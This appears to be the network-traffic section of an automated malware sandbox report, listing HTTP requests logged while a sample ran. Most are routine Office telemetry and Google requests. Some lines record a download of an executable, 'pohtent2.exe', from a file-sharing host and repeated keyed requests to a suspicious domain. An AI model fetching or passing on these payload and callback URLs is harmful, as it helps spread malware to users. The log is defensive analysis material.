Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /dl/15309322/pohtent2.exe HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.URsTCE79FvA.L.B1.O/am=JFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/d=1/ed=1/br=1/rs=ACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
